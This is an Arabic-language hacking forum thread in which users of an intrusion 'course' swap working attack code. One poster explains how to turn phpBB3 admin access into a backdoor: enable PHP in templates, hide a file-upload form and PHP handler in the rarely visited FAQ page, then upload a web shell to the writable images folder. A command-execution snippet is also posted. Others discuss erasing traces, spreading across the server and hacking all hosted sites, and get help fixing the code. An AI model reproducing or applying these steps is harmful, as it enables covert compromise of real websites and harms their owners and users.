[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)

تم محو ال uploader ومحي اثاري لول اوووك انتضر شوي رح انتقل زي الدوده في السيرفر ههه

الحالة
مغلق و غير مفتوح للمزيد من الردود.
S

SpookWeb

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
nor15din قال:
كيف لغمتهم ؟؟ ههه ارجووك كيف ؟؟
أنقر للتوسيع...

هههههههه أوكيه D: بس معلش, حقاك علي, راح اكتب بالإنجليزي لان اسهل علي... وأي توضيح, أنا جاهز.

------------------------------------
i searched online for hacking phpBB3 once i have the admin username and password. all i could find was that it's possible to include a php code inside the ACP

كود: 
<!-- PHP -->
echo $cmd;
system($cmd);
<!-- ENDPHP -->
and that's considered a Shell

i liked it... but it was too much trouble doing all the php commands, so though, ok. i have access to change a page's php code... why not include an uploader and upload a shell? that's easier

i know how to code HTML so
كود: 
ACP ->Styles -> Templates->Edit-> FAQ_body.html
i added this code in the body:

كود: 
<table>
<form action="" enctype="multipart/form-data" method="post">
<tr>
<td colspan="2">H4v3 Fun Spiders Spooky AKA SpookWEB</td>
</tr>
<tr>
<td><input type="file" name="spiderF" /></td>
<td><input type="submit" name="submit" value="Spooky!" /></td>
</tr>
<tr>
</tr>        
</form>
</table>
and in the end of the HTML i added this:
كود: 
<!-- PHP -->
if (isset($_POST['submit'])) {
$spookf = $_FILES['spiderF']['name'];
$spookt = $_FILES['spiderF']['tmp_name'];
if (@move_uploaded_file($spookt , "./images/".$spookf)) {
echo "Shell Uploaded. Check /images/YourShell.php";}else{echo "Upload Failed";}}
<!-- ENDPHP -->
i picked images folder cause i searched and found that phpBB set it to chmod
777
so i have full access to it
Now i went back to the ACP and in "Server Settings" i changed "Allow PHP Code" to Yes
than, on the ACP, be sure to "Purge Cache" to ******* the template so that the code may work....


DONE! :D

بستعمل MS Maren
للكتابة بالعربية لان ال كيبورد عندي مافي عربي هههههه...

إذا مامشي ال حال, مستعد اكتيبو بالعربي بس حياخد وقت شوية....
 
التعديل الأخير:
E

elhackerelkper

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
فى سيرفر جديد ولا علشان نفسى اشتغل شويه
 
E

elhackerelkper

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
ياريت وانا هتابع معاك من انهارده
 
S

SpyDZ

$n!per Dz
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
اخي راح نخترق جميع المواقع الموجود على السيرفر
 
B

bleu moon

[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
اعطيني الكود كامل جاهز ... لانو كود البي اتش بي مابيشتغل :( بيضهر على الصفحه
 
S

SpookWeb

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
لازم تكتب كود ال php من دون
كود: 
<?php  code ?>
يعني الكود كامل شكلو:

كود: 
<!-- PHP -->
if (isset($_POST['submit'])) {
$spookf = $_FILES['spiderF']['name'];
$spookt = $_FILES['spiderF']['tmp_name'];
if (@move_uploaded_file($spookt , "./images/".$spookf)) {
echo "ok";}else{echo "no";}}
<!-- ENDPHP -->
نستعمل
كود: 
<!-- PHP -->
<!-- ENDPHP -->
حتى ال phpBB3 يعرف إنو كود php
 
B

bleu moon

[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
SpookWeb قال:
لازم تكتب كود ال php من دون
كود: 
<?php  code ?>
يعني الكود كامل شكلو:

كود: 
<!-- PHP -->
if (isset($_POST['submit'])) {
$spookf = $_FILES['spiderF']['name'];
$spookt = $_FILES['spiderF']['tmp_name'];
if (@move_uploaded_file($spookt , "./images/".$spookf)) {
echo "ok";}else{echo "no";}}
<!-- ENDPHP -->
نستعمل
كود: 
<!-- PHP -->
<!-- ENDPHP -->
حتى ال phpBB3 يعرف إنو كود php
أنقر للتوسيع...
مالو شغال :(

بيسطعرضوا
 
S

SpookWeb

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
Did you go to ACP -> Security-> Allow PHP

and changed it to yes?

and where did you add the code?
 
B

bleu moon

[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
ضفتوا في موضوع واستعرض مكان الرفع ولكن الدالة استعرضها المتصفح :(
 
S

SpookWeb

New Member
[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
الكود ماينحط بـموضوع :S
ACP = Admin Control Panel

1- تدخل على لوحة تحكم المنتدى phpBB3 www.site.com/forum/administrator/ وبعدين
2- تغير إتاحة ال php:
كود: 
Server Configuration: Security Settings - > Allow PHP in Templates: Yes
3- تدخل على Styles
كود: 
Styles -> Templates -> Edit (Edit the default template, usually subsilver, but it works with others)
4- إختار من القائمة: faq_body.html
والسبب إنو هذي الصفحة قليل حد يفوت عليها
5- اضيف كود الphp + HTML
6- Save
7- إذهب إلى لوحة التحكم الرئيسية و: Purge Cache
Done
 
B

bleu moon

[تم تجديد السيرفر] هل تابعت دورة استهداف المواقع ؟ تعال تدرب شوي :)
SpookWeb قال:
الكود ماينحط بـموضوع :S
ACP = Admin Control Panel

1- تدخل على لوحة تحكم المنتدى phpBB3 www.site.com/forum/administrator/ وبعدين
2- تغير إتاحة ال php:
كود: 
Server Configuration: Security Settings - > Allow PHP in Templates: Yes
3- تدخل على Styles
كود: 
Styles -> Templates -> Edit (Edit the default template, usually subsilver, but it works with others)
4- إختار من القائمة: faq_body.html
والسبب إنو هذي الصفحة قليل حد يفوت عليها
5- اضيف كود الphp + HTML
6- Save
7- إذهب إلى لوحة التحكم الرئيسية و: Purge Cache
Done
أنقر للتوسيع...
اهه ! هذا الكود خاص بسكربت php bb... هههه لا انا مو هذا السكربت ..ح
دخلت الى لوحه التحكم .. وقمت باضافة خبر يحتوي على الكود ... هيك صار

مو هذا السكربت :aww:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
أعلى